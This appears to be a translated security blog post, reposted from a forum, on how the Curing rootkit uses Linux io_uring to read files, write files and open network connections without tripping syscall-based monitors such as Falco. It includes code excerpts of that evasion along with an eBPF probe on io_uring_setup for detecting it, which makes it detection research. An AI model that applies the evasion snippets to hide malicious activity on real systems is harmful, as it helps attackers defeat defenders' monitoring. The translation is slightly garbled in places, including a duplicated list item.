Use io-uring to evade security detection and targeted detection.

Background

The ARMO research team recently revealed a major flaw in Linux runtime security tools, confirming that the io_uring interface allows rootkits to bypass conventional monitoring schemes, and mainstream tools such as Falco, Tetragon, etc. cannot detect attacks using this mechanism. Additionally, the ARMO team has also open-sourced the io_uring-based rootkit tool – Curing:https://github.com/armosec/curing

About io_uring

As we all know, the performance overhead of the system calls to write and read of traditional blocking I/O reads and writes is very high, so the Linux community has proposed some asynchronous I/O read and write strategies, such as thread pools and AIOs, where the simple principle of AIO is that users submit I/O requests through io_submit(), and then call io_getevents() to poll to check which events are ready. Of course, there are many problems with AIO, and Linus once commented on AIO(https://lwn.net/Articles/671657/):

AIO is a poor temporary design, and its main excuse is that “other less gifted people designed this design, and we implemented it for compatibility because database folks – who rarely have the slightest taste – actually use it”. But AIO has always been very, very unattractive. Now you introduce the concept of performing almost any system call asynchronously in a thread, but you’re using that poor interface to implement it.

Building on AIO, the Linux community introduced a new (and notoriously vulnerable) asynchronous I/O mechanism in version 5.1: io_uring. This mechanism allows asynchronous I/O reads and writes by setting up shared memory between kernel mode and user mode, with the following core structure:

  1. Submission Queue (SQ): Used to store I/O requests initiated by user applications. It is a circular queue into which users submit I/O request items.
  2. Completion Queue (CQ): Used to store the results of I/O processed by the kernel. It is also a circular queue where the kernel places the results, from which user applications can read.
  3. Submission Entities (SQEs): The details of each I/O request are stored in submission entities, which users add to the submission queue for kernel mode reading.
  4. Submission Entities (SQEs): The details of each I/O request are stored in submission entities, which users add to the submission queue for kernel mode reading.

To understand it more popularly, take your father buying you oranges as an example:

  1. Traditional synchronous system calls, such as write: At the train station, you are going to buy an orange (user state), but you have no money, you can only ask your father to buy oranges (int 80 triggers syscall), and then your father leaves home to buy oranges (stuck in kernel state), during this period, you can only stay in place and watch your father buy oranges.
  2. Asynchronous system call of io_uring: You send a text message asking your father to buy oranges (write SQE entities to the SQ queue), and then do something else; The father (kernel) processes SMS in batches (receives SQ requests), and automatically returns a “done” SMS (CQE entity) to the CQ queue after purchase, and you can flip through your inbox (check CQ) at any time to see the results, no need to wait there.

To put it simply, compared to traditional system calls, io_uring designed a pair of shared ring buffers (SQ&CQ) for communication between the application and the kernel – this is not particularly similar to ebpf’s map structure for interacting data in kernel and user states.

io_uring the key calls involved

syscall

  • io_uring_setup
    This system call is used to create a setting context:
int io_uring_setup(
u32 entries,                     // [in] queue size element
struct io_uring_params *params   // [in/out]  is used to configure the io_uring, but also to get the configured SQ/CQ.
);
  • io_uring_register
    • To register a persistent file or user buffer for asynchronous I/O, this operation is performed only once at registration:
int io_uring_register(
unsigned int fd,      // [in] io_uring_setup returned file descriptor.
unsigned int opcode,  // [in] Registration type
void *arg,            //[in] pointer to the resource (e.g. buffer array address)
unsigned int nr_args  // [in] Number of resources (e.g., number of buffers)
);
  • io_uring_enter
    • For initializing and completing I/O, you can submit requests from SQ to the kernel (via to_submit parameters) or wait for CQ to complete by blocking min_complete parameters:
int io_uring_enter(
unsigned int fd,            // [in] io_uring_setup returned file descriptor.
unsigned int to_submit,     // [in] the number of I/O requests to be submitted in the SQ
unsigned int min_complete,  // [in] The minimum number of events expected to wait to complete.
unsigned int flags,         // [in] Control Tag (Polling/Interrupting or not)
sigset_t *sig               //[in] Optional Signal Shielding Set
);

Some APIs of the user-space library liburing

  • io_uring_queue_init
    • Initialise io_uring instance:
int io_uring_queue_init(
unsigned entries,        // [in] queue size element
struct io_uring *ring,   // [out] io_uring instance memory pointer
unsigned flags           // [in] initialisation flag (e.g. IORING_SETUP_IOPOLL)
);
  • io_uring_get_sqe
    • Get SQE that work:
struct io_uring_sqe *io_uring_get_sqe(
struct io_uring *ring    // [in] io_uring instance pointer
);
  • io_uring_prep_write
    • Configure write operation requests:
void io_uring_prep_write(
struct io_uring_sqe *sqe, //[in/out] SQE pointer to be configured. 
int fd,                   // [in] object file descriptor
const void *buf,          // [in] Data buffer address
unsigned nbytes,          // [in] Number of bytes written
off_t offset              // [in] file write offset
);
  • io_uring_submit
    • Submit a Bulk Request:
int io_uring_submit(
struct io_uring *ring     // [in] io_uring instance pointer
);
  • io_uring_wait_cqe
    • Wait for the event to complete, block wait until at least one CQE is available:
int io_uring_wait_cqe(
struct io_uring *ring,        // [in] io_uring instance pointer
struct io_uring_cqe **cqe_ptr // [out] The address of the completion event pointer
);

DEMO

#include <iostream>
#include <fcntl.h>
#include <cstring>
#include <liburing.h>

#define QUEUE_DEPTH 1

int main() {
    // 1. Open the target file
    int fd = open("test.txt", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // 2. Initialise the io_uring
    io_uring ring;
    int ret = io_uring_queue_init(QUEUE_DEPTH, &ring, 0);
    if (ret < 0) {
        std::cerr << "io_uring init failed: " << strerror(-ret) << std::endl;
        close(fd);
        return 1;
    }

    // 3. Prepare the data to be written
    const char* data = "Hello, io_uring!\n";
    size_t data_size = strlen(data);

    // 4. Get Submission Queue Entries (SQEs)
    io_uring_sqe* sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        std::cerr << "Failed to get SQE" << std::endl;
        io_uring_queue_exit(&ring);
        close(fd);
        return 1;
    }

    // 5. Set the write operation parameters
    io_uring_prep_write(sqe, fd, data, data_size, 0); // Write from file offset 0
    sqe->user_data = 1; // Optional user identification

    // 6. Submit the request to the kernel.
    ret = io_uring_submit(&ring);
    if (ret < 0) {
        std::cerr << "Submission failed: " << strerror(-ret) << std::endl;
        io_uring_queue_exit(&ring);
        close(fd);
        return 1;
    }

    // 7. Wait for the event to be completed.
    io_uring_cqe* cqe;
    ret = io_uring_wait_cqe(&ring, &cqe);
    if (ret < 0) {
        std::cerr << "Wait CQE failed: " << strerror(-ret) << std::endl;
        io_uring_queue_exit(&ring);
        close(fd);
        return 1;
    }

    // 8. Process the completion results
    if (cqe->res < 0) {
        std::cerr << "Write error: " << strerror(-cqe->res) << std::endl;
    } else {
        std::cout << "Wrote " << cqe->res << " bytes" << std::endl;
    }

    // 9. Mark CQE processed
    io_uring_cqe_seen(&ring, cqe);

    // 10. Clean up resources
    io_uring_queue_exit(&ring);
    close(fd);

    return 0;
}</code>

strace results:

openat(AT_FDCWD, "test.txt", O_WRONLY|O_CREAT|O_TRUNC, 0644) = 3
io_uring_setup(1, {flags=0, sq_thread_cpu=0, sq_thread_idle=0, sq_entries=1, cq_entries=2, features=IORING_FEAT_SINGLE_MMAP|IORING_FEAT_NODROP|IORING_FEAT_SUBMIT_STABLE|IORING_FEAT_RW_CUR_POS|IORING_FEAT_CUR_PERSONALITY|IORING_FEAT_FAST_POLL|IORING_FEAT_POLL_32BITS|IORING_FEAT_SQPOLL_NONFIXED|IORING_FEAT_EXT_ARG|IORING_FEAT_NATIVE_WORKERS|IORING_FEAT_RSRC_TAGS, sq_off={head=0, tail=64, ring_mask=256, ring_entries=264, flags=276, dropped=272, array=384}, cq_off={head=128, tail=192, ring_mask=260, ring_entries=268, overflow=284, cqes=320, flags=280}}) = 4
mmap(NULL, 388, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, 4, 0) = 0x7f5c8930e000
mmap(NULL, 64, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, 4, 0x10000000) = 0x7f5c892d4000
io_uring_enter(4, 1, 0, 0, NULL, 8)     = 1
io_uring_enter(4, 0, 1, IORING_ENTER_GETEVENTS, NULL, 8) = 0

It can be seen that although 17 strings are written at this time, the write system call is not triggered, but replaced by the io_uring related system call.

Curing: Evade safe product detection

Curing uses the rookit tool implemented by the https://github.com/Iceber/iouring-go project, and since the io_uring only supports I/O read and write capabilities, this backdoor does not support bypassing traditional EDR in command execution, but escapes in terms of file read, write and network connection.

Read the code snippet of the file:

flags := syscall.O_RDONLY
// Use io_uring's Openat method to create a request to open a file.
openReq, err := iouring.Openat(unix.AT_FDCWD, cmd.Path, uint32(flags), 0)
if err != nil {
    result.ReturnCode = 1
    result.Output = []byte("Failed to create open request: " + err.Error())
    return result
}
// Submit a request to open a file to the io_uring queue.
if _, err := e.ring.SubmitRequest(openReq, e.resultChan); err != nil {
    result.ReturnCode = 1
    result.Output = []byte("Failed to submit open request: " + err.Error())
    return result
}

Code snippet for writing the file:

flags := syscall.O_WRONLY | syscall.O_CREAT | syscall.O_TRUNC
mode := uint32(0644)
// Use io_uring's Openat method to create a request to open a file.
openReq, err := iouring.Openat(unix.AT_FDCWD, cmd.Path, uint32(flags), mode)
if err != nil {
    result.ReturnCode = 1
    result.Output = []byte("Failed to create open request: " + err.Error())
    return result
}
// Submit a request to write a file to the io_uring queue.
if _, err := e.ring.SubmitRequest(openReq, e.resultChan); err != nil {
    result.ReturnCode = 1
    result.Output = []byte("Failed to submit open request: " + err.Error())
    return result
}

The underlying layer here is essentially the same as the file read and write implementation mentioned above, and then there is the aspect of comparing network communication (which is also where Curing claims to be able to evade traditional EDR detection):

request, err := iouring.Connect(sockfd, &syscall.SockaddrInet4{
    Port: cp.cfg.Server.Port,
    Addr: func() [4]byte {
        var addr [4]byte
        copy(addr[:], net.ParseIP(cp.cfg.Server.Host).To4())
        return addr
    }(),
})

The underlying implementation here is similar to reading and writing files, just writing data into the socket pipeline, such as:

if (registerfiles) {
    // Register socket descriptors to io_uring file tables.
    ret = io_uring_register_files(ring, &sockfd, 1);
    if (ret) {
        fprintf(stderr, "file reg failed\n"); // Registration failure handling
        goto err;
    }
    use_fd = 0; //Using the Registered File Descriptor Index (0)
} else {
    use_fd = sockfd; // Use the original socket descriptor directly.
}

// Prepare to receive requests asynchronously.
sqe = io_uring_get_sqe(ring); // Get a free SQE.
io_uring_prep_recv(sqe, use_fd, iov->iov_base, iov->iov_len, 0);
if (registerfiles)
    sqe->flags |= IOSQE_FIXED_FILE; // tags use registered file descriptors
sqe->user_data = 2; // Set user-defined data identifiers (for result identification)

// Submit a request to the ring buffer.
ret = io_uring_submit(ring);
if (ret <= 0) {
    fprintf(stderr, "submit failed: %d\n", ret);
    goto err;
}

After testing, when configuring Falco to monitor the files and ports configured in Curing, Falco did not move:

Here is also a complaint: ARMO has played a trick here, and the official bypass falco policy clearly only listens to connect system calls, and in the demo of constructing bypass, the system calls required for network requests that can be unmonitored are only connect, which is suspected of asking questions based on the answers. Of course, traditional detection schemes for document reads and writes are completely inapplicable in the context of io_uring policies.

For example, if I directly hook Layer 4 traffic (such as kprobe tcp_v4_connect), I can actually see network communication:

Targeted testing

Take the ltrace result of a demo provided in Curing:

io_uring_queue_init(1, 0x7ffddf399a20, 0, 0x5632021d8d68)                = 0
io_uring_submit(0x7ffddf399a20, 0x7736655d4000, 577, 0x5632021d703b)     = 1
__io_uring_get_cqe(0x7ffddf399a20, 0x7ffddf399a10, 0, 1)                 = 0
io_uring_submit(0x7ffddf399a20, 0x7736655d4000, 5, 0x5632021d7008)       = 1
printf("Successfully wrote %d bytes to s"..., 5Successfully wrote 5 bytes to shadow.pdf
)                         = 41
io_uring_submit(0x7ffddf399a20, 0x7736655d4000, 0, 0)                    = 1
io_uring_queue_exit(0x7ffddf399a20, 1, 3, 0)                             = 3
+++ exited (status 0) +++

Since most applications usually don’t rely on io_uring, then in fact, we can hook io_uring related probes, and there is a pitfall here, that is, you can see that there is no io_uring_prep_write related code in the results of ltrace, because io_uring_prep_write is a static inline function, and its main implementation is through io_uring_prep_rw function:

IOURINGINLINE void io_uring_prep_rw(int op, struct io_uring_sqe *sqe, int fd,
                                    const void *addr, unsigned len,
                                    __u64 offset)
{
        sqe->opcode = (__u8) op;
        sqe->flags = 0;
        sqe->ioprio = 0;
        sqe->fd = fd;
        sqe->off = offset;
        sqe->addr = (unsigned long) addr;
        sqe->len = len;
        sqe->rw_flags = 0;
        sqe->buf_index = 0;
        sqe->personality = 0;
        sqe->file_index = 0;
        sqe->addr3 = 0;
        sqe->__pad2[0] = 0;
}

Then we can actually monitor kprobe io_uring_setup:

int trace_io_uring_setup(struct pt_regs *ctx) {
    //Take the parameters through the registers.
    unsigned int entries = PT_REGS_PARM1(ctx);
    struct io_uring_params *params = (struct io_uring_params *)PT_REGS_PARM2(ctx);

    struct event_data event = {};
    event.pid = bpf_get_current_pid_tgid() >> 32;
    bpf_get_current_comm(&event.comm, sizeof(event.comm)); 

    event.entries = entries;

    if (params) {
        bpf_probe_read_kernel(&event.flags, sizeof(event.flags), ¶ms->flags);
        bpf_probe_read_kernel(&event.sq_thread_cpu, sizeof(event.sq_thread_cpu), ¶ms->sq_thread_cpu);
        bpf_probe_read_kernel(&event.sq_thread_idle, sizeof(event.sq_thread_idle), ¶ms->sq_thread_idle);
    }

    // go ring3
    events.perf_submit(ctx, &event, sizeof(event));
    return 0;
}

The BCC-based demo here is relatively simple and can display some parameters:

Curing is similar (after all, system calls are consistent):

Summary

To put it simply, Curing uses io_uring for file read, write and network communication because it uses non-traditional system calls, bypassing traditional kprobe-based detection (Microsoft Defender, Falco) based on write, read, connect, etc., and targeted detection is to detect io_uring-related system calls, after all, because of component security issues, the use of io_uring is not very common.

This article comes from the 52pojie Forum.(XCarthGetlin

The resources on this site come from the Internet and are used for learning and research by Internet enthusiasts. If your rights are accidentally infringed, please contact the webmaster in time to handle and delete them. Please understand!
IT Resource Hub » Use io-uring to evade security detection and targeted detection.

Leave a Reply

Provide the best collection of resources

View Now Learn More